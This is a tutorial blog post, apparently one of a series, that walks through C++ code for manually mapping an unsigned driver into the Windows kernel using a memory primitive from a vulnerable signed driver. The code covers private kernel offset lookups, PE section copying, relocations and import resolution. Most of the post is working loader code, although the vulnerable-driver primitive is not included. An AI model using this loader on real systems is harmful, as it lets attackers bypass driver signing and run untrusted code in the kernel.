Loading an Unsigned Driver

Monday, July 01, 2024 - 68 mins

A Quick Foreword

This blog turned out much longer than originally intended, however I wanted to make sure I covered the nuances and included every step of the load process for completeness. With that said, I hope you enjoy the blog, and by the end you should know how to load your own unsigned driver! (Assuming you have an appropriate vulnerable driver lying around 😉)

Where We Left Off

Last time we looked at wrapping a kernel primitive from a vulnerable driver in some syntactic sugar to give us “translucent” access to kernel memory from usermode. In this blog we’ll explore how you actually use that kernel primitive to load your own unsigned driver!

Disclaimer: We’ll be using the IKernelPrimitiveProvider, KernelPtr & KernelRef classes we built in the last blog so if you haven’t given my previous blog a read I highly suggest it before continuing with this one!

A Common Starting Point

To find a clean platform from which we can walk through loading an unsigned driver we’ll start with a function that is given the essentials required to perform the load.

bool LoadUnsignedDriver(const std::unique_ptr<byte[]>& pFileBuffer, const KernelOffsets& offsets, std::shared_ptr<IKernelPrimitiveProvider> provider)

So what do we have?

pFileBuffer is a std::unique_ptr to a byte array containing the unsigned driver we wish to load
offsets is a KernelOffsets structure holding some private kernel offsets that we grabbed ahead of time (we’ll cover how in just a second)
provider is a std::shared_ptr holding a pointer to our IKernelPrimitiveProvider interface that we defined last time

Just before we jump into the loading code I want to draw your attention to the KernelOffsets structure. When loading an unsigned driver into the kernel we need to find a few things in ntoskrnl.exe that it doesn’t export. One common practice for finding private symbols is scanning for byte sequences, but I’m personally not a fan of how messy that can be. Instead I prefer to use a lookup table keyed on the hash of the specific kernel we’re loading against. If we don’t have an entry in our lookup table then we can error out early and report that this kernel version isn’t supported. For completeness I’ll cover how the lookup is done, although our starting point function above assumes the lookup has already happened and we have a KernelOffsets structure in hand.

In fact, before I get ahead of myself I’ll just explain what’s actually in our KernelOffsets structure and then later on in the loading code I’ll indicate what we needed that specific symbol for, but for now I’ll just show what symbols it actually contains.

In this case our KernelOffsets structure is defined as:

struct KernelOffsets
{
    // Called ObHeaderCookie in public symbols
    size_t rvaObHeaderCookie;

    // Called ObTypeIndexTable in public symbols
    size_t rvaObTypeIndexTable;

    // Called ObpRootDirectoryObject in public symbols
    size_t rvaObpRootDirectoryObject;
};

Okay, with that out of the way, back to a quick run through of the kernel offset lookup!

KernelOffset Lookup

To look up a set of offsets for a specific version of ntoskrnl.exe it makes sense to key the map on the SHA-256 hash of ntoskrnl.exe. So our map is declared like so:

extern const std::map<std::string, KernelOffsets> kernel_offsets;

Then our definition looks something like:

const std::map<std::string, KernelOffsets> kernel_offsets =
{
    {
        "1ad490cc37aff28f00ace39f99d27bab11b1d9d36095409888d09db2b143571e",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC259F8}
    },
    {
        "5788ef18e2cdbc8bdddf1ddfaf2975652df18c469e11db0d51c98970e6c4636e",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC251E8}
    },
    {
        "d436d6bbf5b73a7fbade752d9d548326dc8ab464f27bf3dfda70f7fbe2d519a9",
        {.rvaObHeaderCookie = 0xCFC728, .rvaObTypeIndexTable = 0xCFCE60, .rvaObpRootDirectoryObject = 0xC259F8}
    },
    {
        "eace65a06bab6b67461ed29783cde9367c3ddd2a31b2594c59d22d77460d4f4b",
        {.rvaObHeaderCookie = 0xCFC72C, .rvaObTypeIndexTable = 0xCFCE80, .rvaObpRootDirectoryObject = 0xC259F8}
    }
};

So you can see that for each version of ntoskrnl.exe we want to be able to load against, we just need to add a map entry that connects the SHA-256 of the ntoskrnl.exe image to a KernelOffsets structure containing the RVAs for the 3 private symbols we need. You’ll notice here I use designated initializers (a C++20 feature), which allow us to easily see which RVA corresponds to which symbol. Without designated initializers each entry would look like:

{
        "d436d6bbf5b73a7fbade752d9d548326dc8ab464f27bf3dfda70f7fbe2d519a9",
        {0xCFC728, 0xCFCE60, 0xC259F8}
}

Which is “fine”, but now I have to go look at the definition of the KernelOffsets structure to figure out which RVA corresponds to which symbol. Now all we need is a handy function to compute the hash of a file which I’ve included below for completeness:

std::string HashFile(std::filesystem::path path)
{
    std::string retval;

    BCRYPT_ALG_HANDLE hAlg = NULL;

    NTSTATUS status = BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_SHA256_ALGORITHM, NULL, 0);

    if (STATUS_SUCCESS == status)
    {
        DWORD objLength = 0;
        ULONG bytesWritten = 0;

        status = BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PUCHAR>(&objLength), sizeof(objLength), &bytesWritten, 0);

        if (STATUS_SUCCESS == status && bytesWritten == sizeof(objLength) && 0 != objLength)
        {
            std::unique_ptr<byte[]> pFileBuffer = std::make_unique<byte[]>(1'000'000);
            std::unique_ptr<byte[]> pHashBuffer = std::make_unique<byte[]>(objLength);

            if (nullptr != pFileBuffer && nullptr != pHashBuffer)
            {
                DWORD hashLength = 0;
                bytesWritten = 0;

                status = BCryptGetProperty(hAlg, BCRYPT_HASH_LENGTH, reinterpret_cast<PUCHAR>(&hashLength), sizeof(hashLength), &bytesWritten, 0);

                if (STATUS_SUCCESS == status && bytesWritten == sizeof(hashLength) && 0 != hashLength)
                {
                    std::unique_ptr<byte[]> pHash = std::make_unique<byte[]>(hashLength);

                    if (nullptr != pHash)
                    {
                        BCRYPT_HASH_HANDLE hHash = NULL;

                        status = BCryptCreateHash(hAlg, &hHash, pHashBuffer.get(), objLength, NULL, 0, 0);

                        if (STATUS_SUCCESS == status && NULL != hHash)
                        {
                            std::ifstream input(path, std::ios::binary);

                            size_t bytesRead = input.read(reinterpret_cast<char*>(pFileBuffer.get()), 1'000'000).gcount();

                            while (bytesRead != 0 && STATUS_SUCCESS == status)
                            {
                                // Hash data
                                status = BCryptHashData(hHash, pFileBuffer.get(), static_cast<ULONG>(bytesRead), 0);

                                // Get next chunk
                                bytesRead = input.read(reinterpret_cast<char*>(pFileBuffer.get()), 1'000'000).gcount();
                            }

                            if (STATUS_SUCCESS == status)
                            {
                                // Successfully hashed all chunks
                                status = BCryptFinishHash(hHash, pHash.get(), hashLength, 0);

                                if (STATUS_SUCCESS == status)
                                {
                                    retval = bin_2_hex(std::span{pHash.get(), hashLength});
                                }
                            }

                            BCryptDestroyHash(hHash);
                        }
                    }
                }
            }
        }

        BCryptCloseAlgorithmProvider(hAlg, 0);
    }

    return retval;
}

You may have also noticed the call to bin_2_hex to convert our hash bytes to a hex string. This is just a helper function I wrote using the Windows API CryptBinaryToStringA which again I have included for completeness:

std::string bin_2_hex(std::span<byte> data)
{
    std::string retval;

    DWORD sizeRequired = 0;

    if (FALSE != CryptBinaryToStringA(&data[0], static_cast<DWORD>(data.size()), CRYPT_STRING_HEXRAW | CRYPT_STRING_NOCRLF, NULL, &sizeRequired) && 0 != sizeRequired)
    {
        std::unique_ptr<char[]> pBuffer = std::make_unique<char[]>(sizeRequired);

        if (FALSE != CryptBinaryToStringA(&data[0], static_cast<DWORD>(data.size()), CRYPT_STRING_HEXRAW | CRYPT_STRING_NOCRLF, pBuffer.get(), &sizeRequired) && 0 != sizeRequired)
        {
            retval = pBuffer.get();
        }
    }

    return retval;
}

For the hashing and hex string conversion we’re using Windows’ BCrypt & WinCrypt libraries to avoid any external dependencies. Now we can calculate the hash of ntoskrnl.exe like so:

std::string kernelHash = HashFile("C:\\Windows\\System32\\ntoskrnl.exe");

Then finally we can check if we have an entry for this hash:

if (kernel_offsets.contains(kernelHash))
{
    LoadUnsignedDriver(pFileBuffer, kernel_offsets.at(kernelHash), provider);
}
else
{
    // Report error indicating we don't have offsets for this version of ntoskrnl.exe
}
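The contains + at pair above walks the map twice. If that bothers you, a single find does the same job and lets the "no entry" case live in the return type. This is only a sketch: FindKernelOffsets is a hypothetical helper name, and KernelOffsets is repeated here just so the snippet compiles on its own.

```cpp
#include <cassert>
#include <cstddef>
#include <map>
#include <optional>
#include <string>

// Same shape as the KernelOffsets structure shown earlier.
struct KernelOffsets
{
    std::size_t rvaObHeaderCookie;
    std::size_t rvaObTypeIndexTable;
    std::size_t rvaObpRootDirectoryObject;
};

// Hypothetical helper: one map lookup, std::nullopt when the hash is unknown.
std::optional<KernelOffsets> FindKernelOffsets(
    const std::map<std::string, KernelOffsets>& table,
    const std::string& kernelHash)
{
    if (auto it = table.find(kernelHash); it != table.end())
    {
        return it->second;
    }

    return std::nullopt;
}
```

A handy side effect is that HashFile returns an empty string on failure, which will never match a key, so a failed hash falls into the same "unsupported kernel" path without any extra checks.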

Alright, with our kernel offsets lookup code out of the way let’s get back to business and dive back into that load routine of ours!

Back to Business

The first order of business is to allocate memory in kernel to load our unsigned driver into, however we first need to know how big an allocation we need:

// Grab the DOS header of our unsigned driver
IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(pFileBuffer.get());

// Now grab the NT headers
IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);

// This entire allocation is modifiable & executable so there's no need for setting any kind of memory protections
KernelPtr ptr = provider->KernelAllocate(pNtHeader->OptionalHeader.SizeOfImage);

As always the keen-eyed among you may have noticed the assumption I make with the line:

IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);

Can you spot it?

There are actually two separate definitions of IMAGE_NT_HEADERS, one for x64 (IMAGE_NT_HEADERS64) and one for x86 (IMAGE_NT_HEADERS32). This is because the structure contains the optional header, which differs in size between x86 and x64. The Windows definition of IMAGE_NT_HEADERS simply resolves to whichever one matches the architecture the binary is being built for. So the assumption here is that the loader itself is built for x64. In fact I should have stated at the start of this blog that we’re targeting an x64 build of Windows, i.e. a 64-bit kernel, however almost all machines these days are 64-bit so I thought it unnecessary. So to be clear:

This blog assumes we are loading a 64-bit unsigned driver on a 64-bit Windows system using a loader that is also built as x64.

I digress. The code above is merely peeking into the NT headers to pull the unsigned driver’s SizeOfImage field which, as Microsoft states, is:

The size (in bytes) of the image, including all headers, as the image is loaded in memory. It must be a multiple of SectionAlignment.

So this is the amount of space we need in kernel to load our unsigned driver. As a side note, the kernel primitive we currently abuse (which is not included in this blog) allocates memory in kernel using MmAllocateContiguousMemory. This API allocates RWX memory so we don’t have to worry about memory protections at all. Luckily, most drivers are written using old-school APIs such as ExAllocatePool which, unless you explicitly ask for non-executable (NX) memory, return executable memory by default. So there is usually no shortage of vulnerable drivers that can provide you with an executable allocation.

Back to Business Again…

With my anecdotes about bitness and old-school APIs out of the way let’s get into the meaty part of the loading process! So now that we have our KernelPtr object that points to our new kernel allocation, we can begin mapping our unsigned driver into kernel!

// Copy in the PE headers - This uses a KernelRef assignment operator to write the contents of the std::span into kernel (see below)
*ptr = std::span<byte>(pFileBuffer.get(), pNtHeader->OptionalHeader.SizeOfHeaders);

// Next copy the sections
IMAGE_SECTION_HEADER* pFirstSection = IMAGE_FIRST_SECTION(pNtHeader);
for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
{
    /*
        Adding to our KernelRef & KernelPtr from last time:
        
        I added a set method to the KernelPtr class that allows us to pass it an RVA and it'll add that RVA
        to the allocation base and move itself to that absolute address. I then also added an overload to the
        KernelRef object to be assignable from a std::span<byte> which simply writes the binary data referenced
        by the span to the address pointed to by the KernelPtr. So in this line:
        
        1. We use the KernelPtr set method to pass it an RVA and get it to move to the kernel address of BaseAddress + RVA
        2. We use the dereference operator * to convert the KernelPtr to a KernelRef
        3. We use the std::span<byte> assignment operator to write the binary data into kernel
    */
    *ptr.set(pFirstSection->VirtualAddress) = std::span<byte>(pFileBuffer.get() + pFirstSection->PointerToRawData, pFirstSection->SizeOfRawData);
    pFirstSection++;
}

// Now we need to apply relocations
IMAGE_DATA_DIRECTORY relocDir = pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

// Do we have any to do?
if (0 != relocDir.Size && 0 != relocDir.VirtualAddress)
{
    // Delta is allocation base minus intended base. We store it as a signed type so that
    // adding it works whether we ended up above or below the intended base.
    std::ptrdiff_t delta = reinterpret_cast<INT_PTR>(ptr.base()) - pNtHeader->OptionalHeader.ImageBase;

    // Yes, okay let's process each block in the data directory
    for (DWORD relocInfoRva = relocDir.VirtualAddress; relocInfoRva < relocDir.VirtualAddress + relocDir.Size;)
    {
        // To avoid excessive kernel reads we'll use the reloc table from the unloaded copy
        DWORD relocFa = RvaToFileOffset(pFileBuffer, relocInfoRva);

        if (0 != relocFa)
        {
            IMAGE_BASE_RELOCATION baseRelocBlock = *reinterpret_cast<IMAGE_BASE_RELOCATION*>(pFileBuffer.get() + relocFa);

            // Create a span to easily iterate over the relocs
            std::span<WORD> typeOffsetPairs(reinterpret_cast<WORD*>(pFileBuffer.get() + relocFa + sizeof(IMAGE_BASE_RELOCATION)), (baseRelocBlock.SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD));

            for (size_t i = 0; i < typeOffsetPairs.size(); i++)
            {
                WORD typeOffsetPair = typeOffsetPairs[i];

                WORD type = (typeOffsetPair >> 12) & 0xF;
                WORD offset = typeOffsetPair & 0xFFF;
                                
                // Block Rva + Offset into page
                DWORD rva = baseRelocBlock.VirtualAddress + offset;

                // Process each reloc type differently
                switch (type)
                {
                case IMAGE_REL_BASED_ABSOLUTE:
                    // Nothing to do here
                    break;
                case IMAGE_REL_BASED_HIGH:
                    *ptr.set(rva) += HIWORD(static_cast<DWORD>(delta));
                    break;
                case IMAGE_REL_BASED_LOW:
                    *ptr.set(rva) += LOWORD(static_cast<DWORD>(delta));
                    break;
                case IMAGE_REL_BASED_HIGHLOW:
                    *ptr.set(rva) += static_cast<DWORD>(delta);
                    break;
                case IMAGE_REL_BASED_HIGHADJ:
                    /*
                        For this one we need to compose a 32-bit value
                        from the high WORD stored at the fixup rva and
                        the low WORD which is in the next entry.
                        Set ptr & read HIWORD
                    */
                    {
                        WORD hiWord = *ptr.set(rva);
                        DWORD composition = (hiWord << 16);
                        // Get LOWORD from next entry
                        composition += typeOffsetPairs[++i];
                        // Now add delta
                        composition += static_cast<DWORD>(delta);
                        // Now add hiword resulting from arithmetic
                        *ptr = HIWORD(static_cast<DWORD>(composition));
                    }
                    break;
                case IMAGE_REL_BASED_DIR64:
                    *ptr.set(rva) += delta;
                    break;
                }
            }

            // Move to next block
            relocInfoRva += baseRelocBlock.SizeOfBlock;
        }
        else
        {
            // Issue!
            throw std::runtime_error("failed to convert rva to file offset");
        }
    }
}
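To make the type/offset decoding and the DIR64 case above a bit more concrete, here is a tiny worked sketch that runs entirely in user mode. DecodeReloc, ApplyDir64 and RelocEntry are hypothetical names for illustration, not part of the loader. With a block VirtualAddress of 0x3000 and an entry of 0xA123, the top nibble 0xA (10) is IMAGE_REL_BASED_DIR64 and the fixup lands at RVA 0x3123. If the image wanted to be at 0x140000000 but was actually placed at 0xFFFFF80012340000, a stored pointer of 0x140001000 becomes 0xFFFFF80012341000.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper type for one decoded base relocation entry.
struct RelocEntry
{
    std::uint16_t type; // top 4 bits, e.g. 10 == IMAGE_REL_BASED_DIR64
    std::uint32_t rva;  // block VirtualAddress + low 12 bits
};

constexpr RelocEntry DecodeReloc(std::uint32_t blockRva, std::uint16_t typeOffsetPair)
{
    return RelocEntry{
        static_cast<std::uint16_t>(typeOffsetPair >> 12),
        blockRva + (typeOffsetPair & 0x0FFFu)};
}

// DIR64 fixup: the 64-bit value stored at the RVA moves by the same amount as the image.
constexpr std::uint64_t ApplyDir64(std::uint64_t storedValue,
                                   std::uint64_t preferredBase,
                                   std::uint64_t actualBase)
{
    // Unsigned wraparound makes this correct whichever base is larger.
    return storedValue + (actualBase - preferredBase);
}
```

On x64 you will realistically only ever see IMAGE_REL_BASED_DIR64 and the IMAGE_REL_BASED_ABSOLUTE padding entries, so these two helpers cover the cases that matter for this blog.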

Okay, quick pause in the code here because there’s a few things to unpack. Copying the headers and sections into our kernel allocation is fairly trivial, however the relocations are slightly more complicated. One of our optimizations here to avoid excessive kernel reads is to parse the relocation information from the copy of the unsigned driver we have in memory in user mode. However we have a slight issue in that our user-mode copy isn’t mapped, and all of the relocation fixup data is stored in terms of RVAs (Relative Virtual Addresses). RVAs are easy to follow in a mapped image, but for us each RVA needs converting to its equivalent location in the unmapped buffer. To do this we use a function called RvaToFileOffset which looks something like:

DWORD RvaToFileOffset(const std::unique_ptr<byte[]>& pFileBuffer, DWORD rva)
{
    DWORD fileOffset = 0;
    IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(pFileBuffer.get());
    IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(pFileBuffer.get() + pDosHeader->e_lfanew);
    IMAGE_SECTION_HEADER* pSection = IMAGE_FIRST_SECTION(pNtHeader);
    
    for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
    {
        if (pSection->VirtualAddress <= rva && rva < pSection->VirtualAddress + pSection->Misc.VirtualSize)
        {
            // Offset into the section
            DWORD offsetRva = rva - pSection->VirtualAddress;
            // Add offset to raw section offset
            fileOffset = pSection->PointerToRawData + offsetRva;
            break;
        }
        pSection++;
    }
    
    return fileOffset;
}

Essentially what RvaToFileOffset does is walk the headers until it gets to the IMAGE_SECTION_HEADER structures. It then iterates over them until it finds a section whose RVA range contains our RVA. Once we have the containing section we convert our RVA into an offset into that section, then add that offset to the PointerToRawData field, which signifies where the section’s data is stored in the file. The resulting value is the offset into the unmapped file that we’re interested in. Using this method allows us to minimise the volume of calls into the driver. This isn’t always necessary, but in cases where the kernel primitives may have side effects it’s useful to only call into the kernel when we need to. We could have even taken it a step further by fixing up the relocations in user mode before copying the sections into kernel, however this would have been even more work so has been left for now. Our final step in the loading process is to resolve the unsigned driver’s import table!

// Let's start resolving imports
IMAGE_DATA_DIRECTORY importDir = pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

// Read from the file buffer to minimise kernel read/write
DWORD importFa = RvaToFileOffset(pFileBuffer, importDir.VirtualAddress);

IMAGE_IMPORT_DESCRIPTOR* pImport = reinterpret_cast<IMAGE_IMPORT_DESCRIPTOR*>(pFileBuffer.get() + importFa);

// While this isn't the null entry
while (pImport->OriginalFirstThunk)
{
    // Grab the module name
    DWORD nameFa = RvaToFileOffset(pFileBuffer, pImport->Name);
    std::string moduleName = reinterpret_cast<char*>(pFileBuffer.get() + nameFa);

    // Attempt to grab the system image base address
    void* pImageBase = KGetModuleHandle(moduleName);

    if (nullptr != pImageBase)
    {
        // We can lookup in the driver buffer but we need to write to the kernel
        DWORD lookupFa = RvaToFileOffset(pFileBuffer, pImport->OriginalFirstThunk);
        IMAGE_THUNK_DATA* lookup = reinterpret_cast<IMAGE_THUNK_DATA*>(pFileBuffer.get() + lookupFa);
        // Move kernel ptr to correct rva
        ptr.set(pImport->FirstThunk);

        for (; 0 != lookup->u1.Function; lookup++, ptr += sizeof(IMAGE_THUNK_DATA))
        {
            // Assume import by name rather than ordinal
            DWORD hintNameFa = RvaToFileOffset(pFileBuffer, static_cast<DWORD>(lookup->u1.Function));
            IMAGE_IMPORT_BY_NAME* pNameData = reinterpret_cast<IMAGE_IMPORT_BY_NAME*>(pFileBuffer.get() + hintNameFa);

            std::string funcName = pNameData->Name;

            // Walk the export table in kernel
            void* pKernelLandFunc = KGetProcAddress(provider, pImageBase, funcName);

            if (nullptr != pKernelLandFunc)
            {
                // Now store that result in the kernel import table
                *ptr = pKernelLandFunc;
            }
            else
            {
                throw std::runtime_error("failed to lookup kernel function: " + funcName + " in module: " + moduleName);
            }
        }
    }
    else
    {
        throw std::runtime_error("failed to get kernel module base address: " + moduleName);
    }

    // Move to next entry in directory table
    pImport++;
}
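The loop above assumes every import is by name. If you ever need to load a driver that imports by ordinal, the PE format marks those entries by setting the top bit of the 64-bit lookup value. A minimal sketch of how the two cases could be told apart is below; the function names and kOrdinalFlag64 are hypothetical (the Windows headers call the flag IMAGE_ORDINAL_FLAG64), and the snippet doesn’t depend on windows.h.

```cpp
#include <cassert>
#include <cstdint>

// Bit 63 of a PE32+ import lookup entry (IMAGE_ORDINAL_FLAG64 in the Windows headers).
constexpr std::uint64_t kOrdinalFlag64 = 0x8000000000000000ULL;

constexpr bool IsImportByOrdinal(std::uint64_t thunk)
{
    return (thunk & kOrdinalFlag64) != 0;
}

// Only meaningful when IsImportByOrdinal(thunk) is true: the ordinal is the low 16 bits.
constexpr std::uint16_t ImportOrdinal(std::uint64_t thunk)
{
    return static_cast<std::uint16_t>(thunk & 0xFFFF);
}

// Only meaningful when IsImportByOrdinal(thunk) is false: the low 31 bits hold
// the RVA of the hint/name entry.
constexpr std::uint32_t HintNameRva(std::uint64_t thunk)
{
    return static_cast<std::uint32_t>(thunk & 0x7FFFFFFF);
}
```

Without a check like this, an ordinal import would be treated as an RVA, RvaToFileOffset would fail to find it, and the name would be read from the wrong place in the file buffer.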

The import resolution code is all fairly standard for PE loading, however, as with the relocations, we walk the import table of the unmapped driver buffer in user mode to save a few more kernel reads. The two functions to take note of here are our implementations of KGetModuleHandle & KGetProcAddress. Like GetModuleHandle & GetProcAddress in user mode, they are used to resolve the base addresses of kernel modules and the addresses of their exports. Let’s start by taking a look at KGetModuleHandle:

void* KGetModuleHandle(const std::string& module)
{
    void* pModuleBase = nullptr;

    HMODULE hNtDll = GetModuleHandleA("ntdll.dll");

    if (NULL != hNtDll)
    {
        fnZwQuerySystemInformation pZwQuerySystemInformation = reinterpret_cast<fnZwQuerySystemInformation>(GetProcAddress(hNtDll, "ZwQuerySystemInformation"));

        if (NULL != pZwQuerySystemInformation)
        {
            ULONG bytesReturned = 0;
            ULONG bufferSize = 0x1000;
            std::unique_ptr<byte[]> pBuffer = std::make_unique<byte[]>(bufferSize);

            NTSTATUS status = pZwQuerySystemInformation(SystemModuleInformation, pBuffer.get(), bufferSize, &bytesReturned);

            while (STATUS_INFO_LENGTH_MISMATCH == status)
            {
                // Increase the buffer size
                bufferSize *= 2;
                pBuffer = std::make_unique<byte[]>(bufferSize);
                // Reset params
                bytesReturned = 0;
                // Try again
                status = pZwQuerySystemInformation(SystemModuleInformation, pBuffer.get(), bufferSize, &bytesReturned);
            }

            if (NT_SUCCESS(status))
            {
                SYSTEM_MODULE_INFORMATION* pModuleInfo = reinterpret_cast<SYSTEM_MODULE_INFORMATION*>(pBuffer.get());

                for (ULONG i = 0; i < pModuleInfo->Count; i++)
                {
                    if (0 == _stricmp(reinterpret_cast<char*>(pModuleInfo->Module[i].FullPathName + pModuleInfo->Module[i].OffsetToFileName), module.c_str()))
                    {
                        pModuleBase = pModuleInfo->Module[i].ImageBase;
                        break;
                    }
                }
            }
            else
            {
                throw std::runtime_error("failed to query system modules");
            }
        }
        else
        {
            throw std::runtime_error("failed to locate function ZwQuerySystemInformation");
        }
    }
    else
    {
        throw std::runtime_error("failed to get a handle to NtDll");
    }

    return pModuleBase;
}

Here the crux of the lookup is an API called “ZwQuerySystemInformation”, which is also exported as “NtQuerySystemInformation”. The documentation from Microsoft can be found here. ZwQuerySystemInformation is not declared in the user-mode Windows headers (winternl.h only declares the Nt name, with a cut-down SYSTEM_INFORMATION_CLASS), however it is still exported by ntdll.lib, so if you write your own declaration in a header and then link ntdll.lib you should be able to call it like any normal Windows API. For simplicity we instead resolve it dynamically using GetModuleHandle & GetProcAddress. As the name suggests, this API is used to retrieve a variety of system information. Which information is selected by the first parameter “SystemInformationClass”, an enumeration defining all of the different kinds of system information that can be queried. I have included the type declaration here for convenience:

using fnZwQuerySystemInformation = NTSTATUS(WINAPI*)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

Luckily for us one value in the SYSTEM_INFORMATION_CLASS enumeration is SystemModuleInformation = 0x0B which queries all loaded kernel modules. The data is returned in a structure defined as follows:

typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

where SYSTEM_MODULE_ENTRY is defined as:

typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

Now, you might be looking at the SYSTEM_MODULE_INFORMATION structure and wondering why the Module array only has a length of 1. This is actually a fairly common structure pattern: the count tells us how big the array really is, and the one-element array definition is there so that we can index beyond its declared bounds while still getting the correct element type. So the structure really just acts as a header for a larger memory allocation.

We have no easy way of knowing ahead of time how many modules are loaded in kernel, so we don’t know how many entries the array needs. Instead we call this API in a loop checking for STATUS_INFO_LENGTH_MISMATCH, which tells us that our buffer still isn’t big enough to hold the information we are asking for. In that case we double the size of our buffer and query again. Once our buffer is large enough, hopefully the call succeeds (or reports a different error). Assuming we have a successful call we can then walk over our array of kernel modules looking for the specific module we care about by comparing against the filename!

The file name is stored in the SYSTEM_MODULE_ENTRY as an offset into the full path at which the file name starts. For example, assume the full path for our kernel module is C:\Windows\System32\drivers\ntfs.sys. Rather than store the file name ntfs.sys separately, the structure just uses the OffsetToFileName field to indicate that the string ntfs.sys starts 28 characters into the FullPathName string. Given that our driver’s import table only references its imported modules by filename, we step over the directory part of the path and just string compare against the filename. This makes the small assumption that no two loaded kernel modules share a filename, however this is essentially always the case.

If you wanted to be overly pedantic and you knew that your unsigned driver only imported from Windows signed kernel modules such as cng.sys, then you could also check that when your filename matches, the file is also at the path you expect, i.e. C:\Windows\System32\drivers. Now, I have no idea why this information is exposed to user-mode, however once we have located the kernel module we care about, the structure also helpfully gives us the loaded module’s ImageBase.
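The OffsetToFileName trick is easy to see in isolation. The sketch below uses a trimmed, hypothetical stand-in for SYSTEM_MODULE_ENTRY (ModuleEntryNameFields, containing only the two fields involved) and a hypothetical FileNameOf helper that returns a view of the file name without copying. It also bounds the scan by the array size, on the assumption that we’d rather not trust the path to be NUL-terminated.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string_view>

// Trimmed stand-in for SYSTEM_MODULE_ENTRY: only the fields used for name matching.
struct ModuleEntryNameFields
{
    std::uint16_t OffsetToFileName;
    unsigned char FullPathName[256];
};

// Return the file-name part of the path as a view into the entry.
std::string_view FileNameOf(const ModuleEntryNameFields& entry)
{
    const char* path = reinterpret_cast<const char*>(entry.FullPathName);

    // Find the terminator, but never look past the end of the array.
    const void* nul = std::memchr(path, '\0', sizeof(entry.FullPathName));
    const std::size_t pathLen = (nullptr != nul)
        ? static_cast<std::size_t>(static_cast<const char*>(nul) - path)
        : sizeof(entry.FullPathName);

    if (entry.OffsetToFileName > pathLen)
    {
        return {}; // Offset points outside the path, treat as "no name"
    }

    return std::string_view(path + entry.OffsetToFileName, pathLen - entry.OffsetToFileName);
}
```

With the path from the example above and an OffsetToFileName of 28, FileNameOf yields ntfs.sys, which is then what gets compared (case-insensitively) against the module name from the import table.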

To summarize, we dynamically resolve the Windows API ZwQuerySystemInformation, use it to query the SystemModuleInformation, walk the list of kernel modules looking for the module we care about by filename, then we extract the ImageBase from the SYSTEM_MODULE_ENTRY structure. This allows us to find the base address of any module in kernel. Now, this is only half the battle. Once we have the base address of the kernel module, we then need to be able to locate the address of functions exported by it, so let’s now turn our attention to KGetProcAddress:

void* KGetProcAddress(std::shared_ptr<IKernelPrimitiveProvider> provider, void* pModuleBase, const std::string& exportName)
{
    void* retval = nullptr;

    // Grab a KernelPtr object to make memory access easier
    KernelPtr ptr(pModuleBase, provider);
        
    // Walk the driver headers to find the export data directory
    IMAGE_DOS_HEADER dosHeader = *ptr;
    ptr += dosHeader.e_lfanew;

    IMAGE_NT_HEADERS ntHeader = *ptr;
    IMAGE_DATA_DIRECTORY exportDataDir = ntHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    // Set via rva
    ptr.set(exportDataDir.VirtualAddress);
    
    // Read the export directory structure
    IMAGE_EXPORT_DIRECTORY exportDir = *ptr;

    // Walk the name pointer table to search by name 
    for (DWORD i = 0; i < exportDir.NumberOfNames; i++)
    {
        // Grab the name RVA
        DWORD nameRva = *ptr.set(exportDir.AddressOfNames + i * sizeof(DWORD));
        // Grab the actual name
        std::string exportedName = *ptr.set(nameRva);

        if (exportedName == exportName)
        {
            // Woo we found it, lookup the associated ordinal
            DWORD ordinalRva = exportDir.AddressOfNameOrdinals + i * sizeof(USHORT);
            USHORT ordinal = *ptr.set(ordinalRva);
                        
            // Calculate the actual function address
            DWORD funcAddrRva = exportDir.AddressOfFunctions + ordinal * sizeof(DWORD);
            DWORD funcRva = *ptr.set(funcAddrRva);

            retval = reinterpret_cast<byte*>(pModuleBase) + funcRva;

            break;
        }
    }

    return retval;
}

We actually have multiple options here. If we wanted to avoid accessing kernel memory again we could use the full path given to us by ZwQuerySystemInformation earlier and walk the export table of each kernel module by reading it directly from disk. However, like our relocation code from earlier, it’s more complicated and time consuming to go reading every driver from disk, so for now we’ll stick to parsing the PE headers in kernel.
